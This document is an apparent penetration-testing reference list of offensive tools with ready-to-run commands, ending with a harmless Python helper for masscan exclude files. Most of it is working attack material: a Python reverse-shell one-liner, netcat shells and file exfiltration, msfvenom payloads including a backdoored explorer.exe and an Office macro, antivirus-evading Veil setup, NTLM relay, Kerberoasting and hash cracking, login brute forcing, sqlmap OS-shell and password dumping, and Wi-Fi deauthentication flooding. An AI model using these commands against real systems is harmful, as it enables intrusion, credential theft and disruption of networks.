Reference List
CrackMapExec – a post-exploitation tool that helps automate assessing the security of large Active Directory networks. It automates the trial and error of trying to log in to several computers in the network [Link].
sudo apt-get install crackmapexec -y
If you already have credentials:
crackmapexec smb 10.0.0.0/24 -u Administrator -p 'Pa$$w0rd1!' -d WORKGROUP
If you only have the hash:
crackmapexec smb 10.0.0.0/24 -u Administrator -H asd3b4...89c0
Replace ‘asd3b4…89c0‘ with the full hash you obtained.
Responder – exploits SMB vulnerabilities [Link]; an older, deprecated version is at [Link].
locate Responder.py
cd /usr/share/responder/
python Responder.py -I eth0 -rdw -v
ntlmrelayx – relays the received NTLM authentication to the target IPs listed in the file target.txt, gaining access to SMB shares with somebody else’s credentials.
locate ntlmrelayx.py
cd /opt/impacket/examples
python ntlmrelayx.py -tf target.txt -smb2support
GPP-Decrypt – Decrypts GPP passwords.
gpp-decrypt edBS...lVmQ
Replace the ‘edBS…lVmQ’ by the
GetUserSPNs – as part of a Kerberoast attack, finds Service Principal Names associated with normal user accounts; if a valid TGS can be gathered for those SPNs, it can be used for offline brute-forcing of the SPN account’s NTLM hash [Link].
python GetUserSPNs.py Domain/User -dc-ip 10.0.0.1 -request
Password: *******
HashCat64 – a powerful brute-force hash cracker, used here on the hash acquired from GetUserSPNs above or from another source [Link].
hashcat64.exe --help
hashcat64.exe -m 13100 kerberoast.txt rockyou.txt
HashCat – Password cracker [Link].
sudo apt install hashcat
hashcat -m 5600 hash.txt rockyou.txt
hashcat -m 5600 hash.txt rockyou.txt --force
hashcat -I
hashcat -d 1,2 -m 2500 -w 3 --status -a 6 wpa2_handshake.hccapx wordlist.txt
hashcat jwt.txt -m 16500 -a 0 rockyou.txt -r OneRuleToRuleThemAll.rule
Note that the hash captured with Responder was copied into hash.txt, and hash mode 5600 is NetNTLMv2. Check which mode (-m) matches the type of hash you are working with using --help. The last argument is the password list, here rockyou.txt; another popular list is BreachParse.
The fourth line lists the available CPUs and GPUs with -I; the next command then selects compute devices 1 and 2 with -d, sets mode 2500 for WPA/WPA2, workload profile 3 (1-4) with -w, and a few other parameters.
Get the OneRuleToRuleThemAll from [Link].
NetCat – nc is a tool that makes it easy to build a range of network functions such as chat, file transfer, remote shell, port scanning, and more [Link].
Server Side (Listener):
nc -nvlp 8080
nc -n -v -l -p 5555 -e /bin/bash
nc -n -v -l -p 5555 -e cmd.exe
nc -l -p 1234 > receive.file
Client-Side:
nc -nv 10.0.0.1 5555
nc -zv domain.com 80-88
nc -w 3 10.0.0.1 1234 < send.file
It can also be used together with other tools, for example:
wget --post-file=file.txt 10.0.0.1:8080
/bin/bash -c '(while ! nc -z -v -w1 localhost 22 2>/dev/null; do echo "Waiting for port 22 to open ..."; sleep 2; done); sleep 2'
Getting a reverse shell with Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Veil-Framework – a tool designed to generate Metasploit payloads that bypass common anti-virus solutions [Link].
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent
msfvenom – a framework to create, encode and encrypt payloads. Note the EXITFUNC options: thread (clean exit), process (restarts it on exit), seh (restarts the process when an error occurs).
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"
The first example creates a payload, setting the output format to ‘c‘ (-f), the architecture to 32-bit x86 (-a), and ‘\x00‘ as a bad character to avoid (-b). There is no output file, so the shellcode is printed on screen to be copied.
msfvenom -p windows/x64/meterpreter/reverse_http EXITFUNC=thread LPORT=4444 LHOST=10.0.0.1 -f raw -o payload.bin --smallest
In the example above the format is ‘raw‘, the output file is ‘payload.bin‘, and --smallest asks for the smallest shellcode possible.
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python -n 26
The command above creates a payload with ‘3‘ iterations of the ‘shikata_ga_nai‘ encoder, avoiding null bytes, formatted for ‘python‘, and prepends ‘26‘ NOPs to the output.
msfvenom -a x86 --platform windows -x explorer.exe -k -p windows/shell/bind_tcp lhost=10.0.0.1 -b "\x00" -f exe -o explorer_backdoor.exe
The previous command takes the existing ‘explorer.exe‘ as a template (-x), and with ‘-k‘ the payload runs in a separate thread. It outputs the new file ‘explorer_backdoor.exe‘ with the appended payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=4444 -f exe > shell.exe
The example above creates a Meterpreter reverse shell as an exe, but instead of passing the IP it lets msfvenom resolve the IP associated with the eth0 interface.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=53 -f vba -o macro.vba
The last example creates a VBA macro to be run from Microsoft Office applications.
Mentalist – creates password lists using sets of rules and can also import a previous list such as CUPP’s output [Link].
mentalist
CUPP – the Common User Passwords Profiler creates a list of possible passwords based on given information such as first names, last names, nicknames, birthdates… about the target and their significant others [Link].
sudo python cupp.py -i
Skipfish – a website spider/crawler that can also test for various vulnerable parameters and configurations.
skipfish -YO -o ~/Desktop/folder http://192.168.x.x
Grabber – a spider/crawler and scanner that tests for SQLi (SQL Injection) and XSS (Cross-Site Scripting).
grabber --spider 1 --sql --xss --url http://example.com
Httrack – recursively downloads a website, creating a local mirror.
httrack http://example.com -O ~/Desktop/file
Note: the same can be done with wget as follows. The default recursion depth is 5; the example sets it to 10:
wget -r -l 10 http://example.com
Wafw00f – detects the presence of a Web Application Firewall.
wafw00f http://example.com
Hydra – A brute-force login cracker that supports numerous protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP [Link]
hydra -l userName -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 5 10.0.0.1 ssh
hydra -L users.lst -P /usr/share/wordlists/rockyou.txt ftp://10.0.0.1
hydra -L usernames.txt -P passwords.txt 10.0.0.1 http-post-form '/login.php:username=^USER^&password=^PASS^:F=incorrect' -v
The first example tries to guess the password for ‘userName‘ using one of Metasploit’s password lists (unix_passwords.txt), with 5 parallel tasks (-t) over SSH.
The second example tries a user list and a password list against FTP; the third tries to log in to a web page through an HTTP POST form, where ^USER^ and ^PASS^ are substituted on each attempt and F= gives the string that marks a failed login.
pw-Inspector – filters the passwords in a word list to meet length criteria (from 6 to 10 characters in the following example).
pw-inspector -i whole_wordlist.txt -o filtered_list.txt -m 6 -M 10
MACof – Used to flood a switch with random MAC addresses.
macof
macof -n 100
macof -i eth0 -d 192.168.1.1 -y 80
Sublist3r – Tool designed to enumerate (passively) subdomains of websites using OSINT [Link].
sublist3r -d example.com -t 5 -e bing
Nessus – a powerful professional vulnerability scanner [Link].
sudo systemctl start nessusd.service
https://localhost:8834/
XSSer – an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications.
sudo apt install xsser
xsser --gtk
xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret"
xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" --auto
xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" -Fp "<script>alert('vulnerable!')</script>"
xsser --url "http://127.0.0.1/login.php?user=XSS&password=secret"
xsser --url "http://127.0.0.1/login.php?user=XSS&password=secret" -Fp "<script>alert('vulnerable!')</script>"
Replace the value of the parameter with XSS to tell XSSer where it should inject the payloads.
SQLmap – automates the process of detecting and exploiting SQL injection flaws and taking over database servers [Link].
sudo apt install sqlmap
python sqlmap.py --help
sqlmap -u "https://example.com/search.php?q="
sqlmap -u "https://example.com/search.php?q=" --level=5 --risk=3
sqlmap -u "https://example.com/search.php?q=" --dbs --all --threads=10
sqlmap --url="https://example.com/login.php" --data="user=test&password=test"
sqlmap -u "https://example.com/search.php?q=" --batch --banner
sqlmap -u "https://example.com/search.php?q=" --batch --passwords
sqlmap -u "https://example.com/search.php?q=" --batch --dbs
sqlmap -u "https://example.com/search.php?q=" --batch --tables -D dbName
sqlmap -u "https://example.com/search.php?q=" --batch --dump -T tableName -D dbName
sqlmap -u "https://example.com/search.php?q=" --batch --os-shell
Note the level (1-5) and risk (1-3) of tests to perform, --dbs for extracting the database names, --all for retrieving everything, and --threads (1-10) to speed up the attack. In the example with --data, the POST variables are supplied.
DirBuster – designed to brute-force directory and file names on web/application servers.
dirb https://example.com/
dirb https://example.com/ wordlist.txt
# DirBuster is also available with a GUI
MDK3 – exploits common Wi-Fi weaknesses, such as brute-forcing hidden SSIDs, beacon flooding, authentication DoS, deauthentication, WPA downgrade, continuously cancelling all traffic, stress testing, and more.
sudo apt install mdk3
sudo mdk3 wlan0mon a
sudo mdk3 wlan0mon d -c 6 -b mac_list.txt
sudo mdk3 wlan0mon p -t 00:00:00:00:00:00 -f ssid_list.txt
Note: the third line floods channel 6 (-c 6) with deauthentication frames, using the mac_list.txt file (-b) to knock the listed users off the network. On the fourth line replace 00:00:00:00:00:00 with the MAC of the access point running the hidden SSID and ssid_list.txt with the list file used for brute-forcing.
Sherlock – an Open Source Intelligence (OSINT) gathering tool. Checks whether a given username has a social network account registered under that name [Link].
sudo apt install sherlock
sherlock --timeout 1 username
Masscan – a mass scanner powerful enough to scan the whole Internet. Be prudent while using this tool; scanning networks without authorization is a crime [Link].
masscan 0.0.0.0/0 --port 12345 --rate 1000000 -oX output.txt --excludefile private_networks.txt
The output.txt will be in XML format, and the exclude file prevents attempts to scan non-public network ranges. The contents of private_networks.txt:
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
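As an added check that is not part of the original list: a small Python script that parses an exclude file of the shape shown above, reports which candidate targets the exclude list removes, and flags non-public addresses (loopback, link-local) that the three RFC 1918 ranges alone do not cover. The file contents are constructed inline and the function names are my own, not masscan's.

```python
import ipaddress

# Constructed sample in the same shape as the exclude file above:
# one network per line, the three RFC 1918 ranges.
EXCLUDE_FILE = """\
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
"""


def load_excludes(text):
    """Parse one network (CIDR or single address) per line; blanks and '#' comments are skipped."""
    nets = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            nets.append(ipaddress.ip_network(line, strict=False))
    return nets


def is_excluded(addr, nets):
    """True if addr falls inside any excluded network."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in nets)


def filter_targets(targets, nets):
    """Split candidate targets into (scan, skip) the way the exclude list would."""
    scan, skip = [], []
    for target in targets:
        (skip if is_excluded(target, nets) else scan).append(target)
    return scan, skip


def unexcluded_private(addrs, nets):
    """Non-public addresses (loopback, link-local, ...) that the exclude list does NOT catch."""
    return [a for a in addrs
            if ipaddress.ip_address(a).is_private and not is_excluded(a, nets)]


if __name__ == "__main__":
    nets = load_excludes(EXCLUDE_FILE)
    candidates = ["8.8.8.8", "192.168.1.1", "172.16.0.5", "127.0.0.1", "169.254.10.10"]
    scan, skip = filter_targets(candidates, nets)
    print("would scan:", scan)
    print("excluded:  ", skip)
    print("private but not excluded:", unexcluded_private(candidates, nets))
```

Anything reported by the last function should be appended to the exclude file before the scan is launched.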